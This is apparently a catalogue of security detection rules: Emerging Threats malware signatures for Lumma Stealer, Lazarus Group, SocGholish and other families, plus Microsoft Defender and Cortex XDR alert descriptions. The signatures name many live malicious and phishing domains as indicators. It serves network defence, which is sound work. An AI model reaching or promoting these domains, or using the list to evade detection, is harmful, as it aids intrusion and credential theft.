ET MALWARE Observed Ducktail Domain (dailyfasterauto .info in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (mafiakorea .com in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (mountainseagroup3 .top in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed KrustyLoader Domain (farstream .org) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed KrustyLoader Domain (sysupdates .org) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lactrodectus Domain in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lactrodectus Domain in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (chrysalisc .com) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (contact .rgssm .in) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (job4writers .com) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (rginfotechnology .com) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (sifucanva .com) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (thefrostery .co .uk) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (antiuncontemporary .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (associationokeo .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (baketransparentadw .pics in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (baresoakopiniocowe .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (bicyclesunhygenico .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (birdvigorousedetertyw .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (bleednumberrottern .home in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (brakesummitfiightre .pics in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (cattilecodereowop .pw in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (chocolatedepressofw .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (colonmoonmushroo .mom in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (decorousnumerousieo .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (despairphtsograpgp .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (detectordiscusser .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (developmentalveiop .home in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (exitassumebangpastcone .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fantasticabnormally .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (feturepoudbicchteo .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fikkeropendorwiw .pw in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fishboatnurrybeauti .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (flexibleagttypoceo .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fossillandscapefewkew .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (greenbowelsustainny .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (healthproline .pro in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (hunterstrawmersp .home in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (ironshottallinko .funu in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (knonkcdalfyhitt .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (landgateindirectdangre .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (lawwormroleveinn .mom in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (lawwormroleveinn .momu in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (legislationdictater .mom in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (mazumaponyanthus .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (mercyaloofprincipleo .pics in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (muggierdragstemmio .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (numberlesswortheiwol .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pavementpreferencewjiao .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pielumchalotpostwo .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pooreveningfuseor .pw in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pooreveningfuseor .pwl in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (problemregardybuiwo .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (punchtelephoneverdi .store in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (reechoingkaolizationp .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (samplepoisonbarryntj .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (scshemevalleywelferw .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (smallrabbitcrossing .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (snuggleapplicationswo .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (strainriskpropos .store in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (superiorhardwaerw .pw in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (telephoneverdictyow .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (telldruggcommitetter .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .funl in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .funr in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .funy in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (thinrecordsunrjisow .pw in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (townsfolkhiwoeko .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (turkeyunlikelyofw .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (unexaminablespectrall .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (vatleaflettrusteeooj .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (villagemagneticcsa .fun in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (woodfeetumhblefepoj .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed MacOS RustDoor Related Domain (serviceicloud .com in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (akites .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (civilizations .store in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (cloudown .store in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (countrysvc .pe .kr in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (ewbjr2h375tjz5fh3wvohsetk .com in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (kakaoaccouts .store in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (kakaoteam .site in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (mofamail .homes in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (mofamail .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (navecorps .com in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (naveralarm .com in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (naveralert .com in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (navercafe .info in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (naverscorp .shop in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (navigation .cc in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (ned .newnotification .server .korea in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nidnaver .help in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nidnaver .info in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nmail .navermail .online .korea in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nsvc .mail .server .korea in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (pdfmicrosoft .ddns .net in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (taxservice .pe .kr in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (upbit-service .pe .kr in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (upbit2024 .re .kr in TLS SNI) | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Domain (parsic .org) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Domain (reclaimmycredit .com) in TLS SNI | This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (darknetlinks .wiki) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (healthbeautycosmetics .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (hmgcyberschools .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (legit .onelink .me) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malware Delivery Domain (a0917004 .xsph .ru in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (buy-new-car .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (caduff-sa .ch in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (carleasingguru .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (hanagram .jp in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (jeepcarlease .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (thefinetreats .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Possible PikaBot Java Loader CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE PyRation Variant - Configuration Request This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE PyRation Variant - Configuration Response This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE RubySleet APT TrollAgent CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .collection .aixpirts .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .day .50adayplan .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .members .openarmscv .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .our .openarmscv .org) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Suspected TA430/Andariel AndarLoader Related Domain in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Suspected TA451 Related FalseFont Backdoor Activity M4 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Suspected TA451 Related FalseFont Backdoor Activity M5 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Synapse/Lambda Ransomware CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE TinyTurlaNG Turla APT GetTask Request This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE TinyTurlaNG Turla APT Initial Client Beacon This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win/Ghostlocker Ransomware Activity M1 (POST) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win/Ghostlocker Ransomware Activity M2 (POST) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/AsyncRAT CnC Checkin (GET) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/MarioLoader CnC Activity (POST) M1 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/MarioLoader CnC Activity (POST) M2 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/MarioLoader Payload Request (GET) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
Microsoft Defender For Cloud - Login from an unusual data center An unusual login is an anomaly in the access pattern to your resource. Usually, data resources are accessed from similar locations, either by an application that accesses the data to provide business logic or by a user performing administrative tasks. For production workloads, the access pattern stabilizes over time to a concrete list of locations. A login to your resource from an unusual data center therefore indicates an anomaly that should be investigated. At times it can come from a familiar origin that moved to a different location due to an IP change or lease, travel, or the use of different cloud providers, VPNs, etc. Often, access from a data center comes from IPs that belong to cloud providers but are leased to customers, and therefore does not represent access from the cloud provider company itself. Inspect the login event, identify the application or user (based on application name and IP/location), and determine whether it is familiar to you or suspicious. If it is unrecognized, use firewall rules to limit access to your resource, and make sure you use strong passwords and not well-known user names. Also consider using only AAD authentication to further enhance your security posture. Finally, review the audit logs (if turned on) to understand the activity that was performed, and consider taking additional actions to protect the data.
Microsoft Defender For Cloud - Malicious blob was downloaded from a storage account (Preview) A malicious blob was downloaded from the blob container ‘dms-documents’ in the storage account ‘tmstukslmppro001’.
We recommend taking immediate actions:
1. Isolate or delete the malicious blob to stop further malware distribution.
2. If you have automated responses for malware uploads, this security alert suggests they may not be effective or work well. Revisit your automation settings.
It is possible that this malware was downloaded more than once and from more than one source. To get detailed information on who read the blob (if AAD authentication was used), how, and when, refer to the “Supporting evidence events” section in the Azure Portal. The “General Information” and “Entities” sections provide information on the downloaded blob and the detected malware.
Microsoft Defender For Cloud - Security incident detected suspicious virtual machines This incident indicates suspicious activity on your virtual machines. Multiple alerts from different Defender for Cloud plans have been triggered revealing a similar pattern on your virtual machines. This might indicate a threat actor has gained unauthorized access to your environment and is attempting to compromise it.
Microsoft Defender For Cloud - Suspicious installation of a GPU extension was detected on your virtual machine (Preview) A suspicious installation of a GPU extension was detected on your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use the GPU driver extension to install GPU drivers on your virtual machine via the Azure Resource Manager to perform cryptojacking. This activity is deemed suspicious because the principal’s behavior departs from its usual patterns.
Palo Alto Networks Cortex XDR - A service account successfully logged in from a new country or ASN A service account successfully logged in from a new country or ASN
Palo Alto Networks Cortex XDR - A user enabled the Windows default Guest account A user enabled the Windows default Guest account
Palo Alto Networks Cortex XDR - A user uploaded over 500 MB to a rare storage or mail domain A user uploaded over 500 MB to a rare storage or mail domain
Palo Alto Networks Cortex XDR - Alcatel OmniPCX Office MasterCGI Remote Command Execution Vulnerability Alcatel OmniPCX Office MasterCGI Remote Command Execution Vulnerability
Palo Alto Networks Cortex XDR - AndroidOS Baiduprotect PUA Traffic Detection AndroidOS Baiduprotect PUA Traffic Detection
Palo Alto Networks Cortex XDR - Bad Malware, wipe if ran Bad Malware, wipe if ran
Palo Alto Networks Cortex XDR - Bind9 DNS Server Denial-of-Service Vulnerability Bind9 DNS Server Denial-of-Service Vulnerability
Palo Alto Networks Cortex XDR - Cobalt Strike DNS Redirector Traffic Detection Cobalt Strike DNS Redirector Traffic Detection
Palo Alto Networks Cortex XDR - COM Object Hijacking COM Object Hijacking - 4007318107
Palo Alto Networks Cortex XDR - Cortex Payload Hijack Cortex Payload Hijack - 3421945413
Palo Alto Networks Cortex XDR - D-Link D-View TftpSendFileThread Directory Traversal Vulnerability D-Link D-View TftpSendFileThread Directory Traversal Vulnerability
Palo Alto Networks Cortex XDR - Detect Active Directory Management DLL on Non-ADMV Detect Active Directory Management DLL on Non-ADMV
Palo Alto Networks Cortex XDR - DNS Security Domain Exception DNS Security Domain Exception
Palo Alto Networks Cortex XDR - Fragroute Evasion Attack For Unknown-TCP Traffic Fragroute Evasion Attack For Unknown-TCP Traffic
Palo Alto Networks Cortex XDR - Globally uncommon suspicious injection from a signed process Globally uncommon suspicious injection from a signed process
Palo Alto Networks Cortex XDR - High-frequency NTLM brute force attempts detected High-frequency NTLM brute force attempts detected
